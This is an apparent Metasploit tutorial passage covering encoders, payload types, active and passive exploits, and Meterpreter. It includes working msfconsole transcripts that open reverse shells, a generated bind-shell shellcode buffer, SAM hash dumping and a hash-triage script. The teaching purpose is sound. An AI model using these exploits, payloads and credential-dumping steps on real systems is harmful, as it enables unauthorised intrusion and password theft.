   x86/fnstenv_mov         Variable-length Fnstenv/mov Dword XOR Encoder
   x86/jmp_call_additive   Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha            Non-Alpha Encoder
   x86/nonupper            Non-Upper Encoder
   x86/shikata_ga_nai      Polymorphic XOR Additive Feedback Encoder
   x86/unicode_mixed       Alpha2 Alphanumeric Unicode Mixedcase Encoder
   x86/unicode_upper       Alpha2 Alphanumeric Unicode Uppercase Encoder
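What the XOR encoders in that list actually do is easier to see in code than in a name. The Ruby class below is an added example, not one of Metasploit's encoder modules: the simplest form of XOR encoding, in which the encoder searches for a single-byte key such that neither the key itself nor any encoded byte is a "bad character" the vulnerable input path would mangle (a NUL terminator, a newline in a line-based protocol), and a decode step that stands in for the decoder stub a real encoder prepends to the payload. The class name, its methods, the sample bytes and the bad-character set are all constructed for this example.

```ruby
# Added example of single-byte XOR payload encoding with bad-character
# avoidance. Not Metasploit's own encoder code; the real modules also emit
# an x86 decoder stub, which is out of scope here.
class XorEncoder
  # bad_chars: a binary string of bytes that must not appear in the output.
  def initialize(bad_chars)
    @bad = bad_chars.bytes
  end

  # Returns [key, encoded_bytes]. Raises if no single-byte key works; that
  # is the point at which a multi-byte or additive-feedback scheme (such as
  # shikata_ga_nai) becomes necessary.
  def encode(payload)
    raw = payload.bytes
    (1..255).each do |key|
      next if @bad.include?(key)          # the decoder stub embeds the key too
      out = raw.map { |b| b ^ key }
      return [key, out.pack('C*')] if (out & @bad).empty?
    end
    raise ArgumentError, 'no single-byte XOR key avoids the bad characters'
  end

  # What the decoder stub does on the target: XOR is its own inverse.
  def self.decode(key, encoded)
    encoded.bytes.map { |b| b ^ key }.pack('C*')
  end

  # "\x31\xc0..." rendering for pasting into an exploit.
  def self.to_hex(bytes)
    bytes.bytes.map { |b| format('\x%02x', b) }.join
  end
end

if __FILE__ == $0
  # Constructed sample standing in for shellcode: contains NULs and a "\n".
  payload = "\x31\xc0\x50\x68\x00\x0a\x2f\x2f\x00\x73\x68".b
  enc = XorEncoder.new("\x00\x0a\x0d")
  key, encoded = enc.encode(payload)
  puts "key       : 0x#{format('%02x', key)}"
  puts "encoded   : #{XorEncoder.to_hex(encoded)}"
  puts "roundtrip : #{XorEncoder.decode(key, encoded) == payload ? 'ok' : 'FAILED'}"
end
```

Two things the exercise makes obvious: the encoder only fixes bad characters, it does nothing for detection (a constant key is a trivial signature), and the check has to include the key byte itself, because the key ends up in the decoder stub that is sent with the payload.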

Lastly, issuing the 'show nops' command will display the NOP generators that Metasploit has to offer.

msf > show nops

NOP Generators
==============

   Name             Description
   ----             -----------
   armle/simple     Simple
   php/generic      PHP Nop Generator
   ppc/simple       Simple
   sparc/random     SPARC NOP generator
   tty/generic      TTY Nop Generator
   x64/simple       Simple
   x86/opty2        Opty2
   x86/single_byte  Single Byte

The setg Command

In order to save a lot of typing during a pentest, you can set global variables within msfconsole. You can do this with the 'setg' command. Once these have been set, you can use them in as many exploits and auxiliary modules as you like. You can also save them for use the next time you start msfconsole. However, the pitfall is forgetting you have saved globals, so always check your options before you 'run' or 'exploit'. Conversely, you can use the 'unsetg' command to unset a global variable. In the examples that follow, variables are entered in all-caps (ie: LHOST), but Metasploit is case-insensitive so it is not necessary to do so.

msf > setg LHOST 192.168.1.101
LHOST => 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST => 192.168.1.136

After setting your different variables, you can run the 'save' command to save your current environment and settings. With your settings saved, they will be automatically loaded on startup, which saves you from having to set everything again.

msf > save
Saved configuration to: /root/.msf3/config
msf >
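As an added example, not Metasploit's own datastore code, the Ruby class below models the scoping rules that set, setg, unset and save above rely on, and that make the "forgotten globals" pitfall possible: a module-level set shadows a global only while that module is in use, switching modules with use or back discards module-level values, a set issued at the top-level prompt is itself global, and unset all clears only the scope you are in. The module and option names are the ones used in this chapter; the Console class and its method names are mine, and it is a simplified model, not the framework's Msf::DataStore.

```ruby
# Added example: a simplified model of msfconsole option scoping
# (global datastore vs. the current module's datastore). Not Metasploit code.
class Console
  attr_reader :globals, :current

  def initialize
    @globals = {}   # setg / unsetg, and "set" at the top-level prompt
    @locals  = {}   # set / unset while a module is in use
    @current = nil
  end

  # Option names are case-insensitive, as in the framework.
  def setg(name, value)
    @globals[name.upcase] = value
  end

  def unsetg(name)
    @globals.delete(name.upcase)
  end

  # "use": enter a module context; module-local options start empty.
  def use(mod)
    @current = mod
    @locals  = {}
    self
  end

  # "back": leave the module; locals are discarded, globals survive.
  def back
    @current = nil
    @locals  = {}
    self
  end

  # "set" is local inside a module and global at the top-level prompt.
  def set(name, value)
    scope[name.upcase] = value
  end

  def unset(name)
    scope.delete(name.upcase)
  end

  # "unset all" flushes only the current scope.
  def unset_all
    scope.clear
  end

  # Lookup order: module-local first, then global.
  def get(name)
    key = name.upcase
    @locals.key?(key) ? @locals[key] : @globals[key]
  end

  # What "show options" effectively reports for the given option names.
  def effective_options(names)
    names.map { |n| [n.upcase, get(n)] }.to_h
  end

  private

  def scope
    @current ? @locals : @globals
  end
end

if __FILE__ == $0
  c = Console.new
  c.setg('LHOST', '192.168.1.101')
  c.setg('RHOST', '192.168.1.136')
  c.use('dos/windows/smb/ms09_001_write')
  c.set('rhost', '192.168.1.1')                 # shadows the global RHOST
  p c.effective_options(%w[RHOST LHOST])        # RHOST is 192.168.1.1 here
  c.back.use('exploit/windows/smb/ms08_067_netapi')
  p c.effective_options(%w[RHOST LHOST])        # the global 192.168.1.136 is back
end
```

The second module silently inherits RHOST 192.168.1.136 without anyone typing it, which is exactly why the text says to check your options before every run or exploit.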

The use Command

When you have decided on a particular module to make use of, issue the 'use' command to select it. The 'use' command changes your context to a specific module, exposing type-specific commands. Notice in the output below that any global variables that were previously set are already configured.

msf > use dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port

msf auxiliary(ms09_001_write) >

Metasploit Exploits

All exploits in the Metasploit Framework fall into two categories: active and passive.

Active Exploits

Active exploits will exploit a specific host, run until completion, and then exit. Brute-force modules will exit when a shell opens from the victim. Module execution stops if an error is encountered. You can force an active module to the background by passing '-j' to the exploit command:

msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >

Active Exploit Example

The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.104[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.104[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Passive Exploits

Passive exploits wait for incoming hosts and exploit them as they connect. Passive exploits almost always focus on clients such as web browsers, FTP clients, etc. They can also be used in conjunction with email exploits, waiting for connections. Passive exploits report shells as they happen; these can be enumerated by passing '-l' to the sessions command. Passing '-i' will interact with a shell.

msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.101:52647 -> 192.168.1.104:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Passive Exploit Example

The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.

msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.

[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.104:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.104:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.101:4444 -> 192.168.1.104:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

Using Exploits
Selecting an exploit in Metasploit adds the 'exploit' and 'check' commands to msfconsole. Where a module implements 'check', it is worth running first: it tells you whether the target looks vulnerable without sending the actual exploit.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > help
...snip...
Exploit Commands
================
    Command   Description
    -------   -----------
    check     Check to see if a target is vulnerable
    exploit   Launch an exploit attempt
    rcheck    Reloads the module and checks if the target is vulnerable
    rexploit  Reloads the module and launches an exploit attempt
msf exploit(ms08_067_netapi) >

Using an exploit also adds more options to the 'show' command (the transcript below switches to the ms03_026_dcom module).
msf exploit(ms03_026_dcom) > show targets
Exploit targets:
    Id  Name
    --  ----
    0   Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > show payloads
Compatible payloads
===================
    Name                Description
    ----                -----------
    generic/debug_trap  Generic x86 Debug Trap
...snip...
msf exploit(ms03_026_dcom) > show options
Module options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST  192.168.1.120    yes       The target address
    RPORT  135              yes       The target port
Exploit target:
    Id  Name
    --  ----
    0   Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > show advanced
Module advanced options:
    Name           : CHOST
    Current Setting:
    Description    : The local client address
    Name           : CPORT
    Current Setting:
    Description    : The local client port
...snip...
msf exploit(ms03_026_dcom) > show evasion
Module evasion options:
    Name           : DCERPC::fake_bind_multi
    Current Setting: true
    Description    : Use multi-context bind calls
...snip...

Metasploit Payloads
There are three types of payload module in Metasploit: Singles, Stagers and Stages. These different types allow for a great deal of versatility and are useful across numerous scenarios. Whether or not a payload is staged can be read from its name: in a staged payload the stage and the stager are separated by a '/'. For example, "windows/shell_bind_tcp" is a single payload with no stage, whereas "windows/shell/bind_tcp" consists of a stager (bind_tcp) and a stage (shell).

Singles Singles are payloads that are self-contained and completely standalone. A Single payload can be something as simple as adding a user to the target system or running calc.exe.

Stagers
Stagers set up a network connection between the attacker and the victim and are designed to be small and reliable. It is difficult to always do both of these well, so the result is multiple similar stagers. Metasploit will use the best one when it can and fall back to a less-preferred one when necessary.
Windows NX vs NO-NX stagers:
 NO-NX stagers have reliability issues on NX-capable CPUs with DEP enabled.
 NX stagers are bigger, because they must call VirtualAlloc to obtain executable memory.
 The default is now NX-safe and Windows 7 compatible.

Stages
Stages are payload components that are downloaded by stager modules. The various payload stages provide advanced features with no size limits, such as Meterpreter, VNC injection and the iPhone 'ipwn' shell.
Payload stages automatically use 'middle stagers':
 A single recv() call fails with large payloads, because it returns only the bytes that have arrived so far.
 The stager receives the middle stager.
 The middle stager then performs a full download of the stage.
 This also works better for RWX memory.

Payload Types
Metasploit contains many different types of payloads, each serving a unique role within the framework. Let's take a brief look at the various types of payloads available and get an idea of when each type should be used.

Inline (Non Staged)
A single payload containing the exploit and full shellcode for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything in one piece. However, some exploits won't support the resulting size of these payloads.

Staged Stager payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

Meterpreter Meterpreter, the short form of Meta-Interpreter is an advanced, multi-faceted payload that operates via dll injection. The Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques. Scripts and plugins can be loaded and unloaded dynamically as required and Meterpreter development is very strong and constantly evolving.

PassiveX PassiveX is a payload that can help in circumventing restrictive outbound firewalls. It does this by using an ActiveX control to create a hidden instance of Internet Explorer. Using the new ActiveX control, it communicates with the attacker via HTTP requests and responses.

NoNX The NX (No eXecute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory. In Windows, NX is implemented as Data Execution Prevention (DEP). The Metasploit NoNX payloads are designed to circumvent DEP.

Ord Ordinal payloads are Windows stager based payloads that have distinct advantages and disadvantages. The advantages being it works on every flavor and language of Windows dating back to Windows 9x without the explicit definition of a return address. They are also extremely tiny. However two very specific disadvantages make them not the default choice. The first being that it relies on the fact that ws2_32.dll is loaded in the process being exploited before exploitation. The second being that it's a bit less stable than the other stagers. IPv6 The Metasploit IPv6 payloads, as the name indicates, are built to function over IPv6 networks.

Reflective DLL injection Reflective DLL Injection is a technique whereby a stage payload is injected into a compromised host process running in memory, never touching the host hard drive. The VNC and Meterpreter payloads both make use of reflective DLL injection. You can read more about this from Stephen Fewer, the creator of the reflective DLL injection method.

Metasploit Generating Payloads
During exploit development, you will most certainly need to generate shellcode to use in your exploit. In Metasploit, payloads can be generated from within msfconsole. When you 'use' a certain payload, Metasploit adds the 'generate' command.
msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > help
...snip...
Payload Commands
================
    Command   Description
    -------   -----------
    generate  Generates a payload
msf payload(bind_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
    -b   The list of characters to avoid: '\x00\xff'
    -e   The name of the encoder module to use.
    -f   The output file name (otherwise stdout)
    -h   Help banner.
    -o   A comma separated list of options in VAR=VAL format.
    -s   NOP sled length.
    -t   The output type: ruby, perl, c, or raw.
To generate shellcode without any options, simply execute the 'generate' command.
msf payload(bind_tcp) > generate
# windows/shell/bind_tcp - 298 bytes (stage 1)
# http://www.metasploit.com
# EXITFUNC=thread, LPORT=4444, RHOST=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb" +
"\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
"\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75" +
"\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9" +
"\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56" +
"\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" +
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85" +
"\xf6\x75\xec\xc3"
...snip...

About the Metasploit Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels and more. Meterpreter was originally written by skape for Metasploit 2.x; common extensions were merged for 3.x, and it was being overhauled for Metasploit 3.3 when this text was written. The server portion is implemented in plain C and is now compiled with MSVC, making it somewhat portable. The client can be written in any language, but Metasploit has a full-featured Ruby client API.

How Meterpreter Works
The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.
The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL.
The Meterpreter core initialises, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client.
Lastly, Meterpreter loads extensions. It always loads stdapi and loads priv if the module gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV protocol.

Meterpreter Design Goals
Stealthy: Meterpreter resides entirely in memory and writes nothing to disk. No new processes are created, as Meterpreter injects itself into the compromised process and can migrate to other running processes easily. By default, Meterpreter uses encrypted communications. All of this leaves limited forensic evidence and has little impact on the victim machine.
Powerful: Meterpreter uses a channelised communication system. The TLV protocol has few limitations.
Extensible: Features can be augmented at runtime and are loaded over the network. New features can be added to Meterpreter without having to rebuild it.

Adding Runtime Features New features are added to Meterpreter by loading extensions. The client uploads the DLL over the socket. The server running on the victim loads the DLL in-memory and initializes it. The new extension registers itself with the server. The client on the attackers machine loads the local extension API and can now call the extensions functions. This entire process is seamless and takes approximately 1 second to complete.
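An added illustration of the TLV framing mentioned above, written for this page and not taken from Meterpreter's source: each item carries a big-endian 4-byte length (counting the 8-byte header), a 4-byte type and the value, and the decoder checks every length field before using it, because on the wire that length arrives from the other side of the connection. The type constants, the request layout and the method and extension names used as values are assumed for the example; they are not Meterpreter's real constants.

```python
import struct

# Type ids constructed for this example (Meterpreter's real ids also encode a
# meta-type such as string/uint in the high bits; that is not reproduced here).
TLV_TYPE_METHOD = 1
TLV_TYPE_REQUEST_ID = 2
TLV_TYPE_STRING = 3
TLV_TYPE_UINT = 4

# Header: big-endian length (counting these 8 bytes) followed by the type.
HEADER = struct.Struct(">II")


def tlv_encode(tlv_type, value):
    """Serialise one TLV. Strings are NUL-terminated, ints are 32-bit big-endian."""
    if isinstance(value, str):
        payload = value.encode() + b"\x00"
    elif isinstance(value, int):
        payload = struct.pack(">I", value)
    elif isinstance(value, (bytes, bytearray)):
        payload = bytes(value)
    else:
        raise TypeError("unsupported TLV value: %r" % (value,))
    return HEADER.pack(HEADER.size + len(payload), tlv_type) + payload


def tlv_decode(buf):
    """Split a buffer of concatenated TLVs into (type, value) pairs.
    Every length field is validated before it is used: it came from the peer."""
    items = []
    off = 0
    while off < len(buf):
        if len(buf) - off < HEADER.size:
            raise ValueError("truncated TLV header at offset %d" % off)
        length, tlv_type = HEADER.unpack_from(buf, off)
        if length < HEADER.size or off + length > len(buf):
            raise ValueError("bad TLV length %d at offset %d" % (length, off))
        items.append((tlv_type, bytes(buf[off + HEADER.size:off + length])))
        off += length
    return items


def build_request(method, request_id, extra=()):
    """A request packet: method name and request id, then any argument TLVs."""
    body = tlv_encode(TLV_TYPE_METHOD, method)
    body += tlv_encode(TLV_TYPE_REQUEST_ID, request_id)
    for tlv_type, value in extra:
        body += tlv_encode(tlv_type, value)
    return body


def parse_request(buf):
    """Decode a request into a dict keyed by type, converting the known kinds."""
    fields = {}
    for tlv_type, value in tlv_decode(buf):
        if tlv_type in (TLV_TYPE_METHOD, TLV_TYPE_STRING):
            fields[tlv_type] = value.rstrip(b"\x00").decode()
        elif tlv_type in (TLV_TYPE_REQUEST_ID, TLV_TYPE_UINT):
            (fields[tlv_type],) = struct.unpack(">I", value)
        else:
            fields[tlv_type] = value
    return fields


def rejects_cleanly(buf):
    """True if a malformed buffer is refused instead of being over-read."""
    try:
        tlv_decode(buf)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Example values only: a 'load this extension' style request.
    pkt = build_request("core_loadlib", 7, [(TLV_TYPE_STRING, "ext_server_stdapi.dll")])
    print(len(pkt), "bytes:", parse_request(pkt))
    print("oversized length rejected:", rejects_cleanly(b"\x00\x00\xff\xff\x00\x00\x00\x01abc"))
```

The two length checks in tlv_decode are the part worth copying: a length smaller than the header would make the loop spin in place, and one larger than the buffer would read past it.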

Metasploit Meterpreter Basics

Since Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help you get familiar with this most powerful tool. Throughout this chapter, almost every available Meterpreter command is covered. For those that aren't covered, experimentation is the key to successful learning.

help
The 'help' command, as may be expected, displays the Meterpreter help menu.
meterpreter > help
Core Commands
=============
    Command     Description
    -------     -----------
    ?           Help menu
    background  Backgrounds the current session
    channel     Displays information about active channels
...snip...

background

The 'background' command sends the current Meterpreter session to the background and returns you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

ps
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Process list
============
    PID  Name            Path
    ---  ----            ----
    132  VMwareUser.exe  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
    152  VMwareTray.exe  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
    288  snmp.exe        C:\WINDOWS\System32\snmp.exe
...snip...

migrate
Using the 'migrate' post module, you can migrate to another process on the victim. This matters for client-side sessions: if the session lives inside the browser and the user closes it, the session dies with it.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

ls
As in Linux, the 'ls' command lists the files in the current remote directory.
meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
    Mode              Size  Type  Last modified                   Name
    ----              ----  ----  -------------                   ----
    40777/rwxrwxrwx   0     dir   Sat Oct 17 07:40:45 -0600 2009  .
    40777/rwxrwxrwx   0     dir   Fri Jun 19 13:30:00 -0600 2009  ..
    100666/rw-rw-rw-  218   fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
    40555/r-xr-xr-x   0     dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...

download
The 'download' command downloads a file from the remote machine. Note the doubled backslashes in the Windows path: a single backslash is treated as an escape character by the Meterpreter console.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

upload
As with the 'download' command, you need to use doubled backslashes with the 'upload' command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

ipconfig
The 'ipconfig' command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0
meterpreter >

getuid
Running 'getuid' displays the user that the Meterpreter server is running as on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

execute
The 'execute' command runs a program on the target. Here -f names the program, -i interacts with the new process and -H hides its window.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

shell
The 'shell' command presents you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

idletime
Running 'idletime' displays how long the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

hashdump
The 'hashdump' post module dumps the contents of the SAM database. It needs SYSTEM privileges, which is why the 'getuid' output above matters. Each line is user:RID:LM hash:NT hash; the value aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >

If you have gone through these commands and their usage, you should now have a working picture of the Metasploit framework.
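Added example, not part of the page: a parser for the hashdump output above that triages each line before any cracking starts. The empty-string LM and NT hash constants are well known; the sample input is the page's own output with the line-wrapped hashes rejoined.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

# The hashdump output from the page above (line-wrapped hashes rejoined).
SAMPLE = """
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
"""


def parse_hashdump(text):
    """Parse pwdump-style 'user:rid:lm:nt:::' lines into dicts.
    Status lines such as '[*] ...' and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError("malformed hash on line: %r" % line)
        entries.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return entries


def triage(entry):
    """What one line tells an attacker before any cracking is attempted."""
    notes = []
    if entry["nt"] == EMPTY_NT:
        notes.append("blank password")
    if entry["lm"] == EMPTY_LM:
        notes.append("no LM hash stored (LM disabled, blank, or password over 14 chars)")
    else:
        notes.append("LM hash present: crackable as two case-insensitive 7-char halves")
        # LM hashes are two independent halves; an empty second half means the
        # password fits in the first seven characters.
        if entry["lm"][16:] == EMPTY_LM[16:]:
            notes.append("second LM half empty: password is 7 chars or fewer")
    if entry["rid"] == 500:
        notes.append("built-in Administrator (RID 500), prime pass-the-hash target")
    return notes


def triage_dump(text):
    """Map each user to its triage notes."""
    return {e["user"]: triage(e) for e in parse_hashdump(text)}


if __name__ == "__main__":
    for user, notes in triage_dump(SAMPLE).items():
        print(user)
        for n in notes:
            print("   -", n)
```

On this dump the script flags Guest as having a blank password, the dook and victim passwords as seven characters or fewer, and every account with a non-empty LM hash as a cheap cracking target.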

You must be eager to exploit, but auxiliary modules are worth a mention first.

When most people think of Metasploit, exploits come to mind. Exploits are cool, exploits get you shell, and exploits get all the attention. But sometimes you need something more than that. By definition, a Metasploit module that is not an exploit is an auxiliary module, which leaves a lot to the imagination.

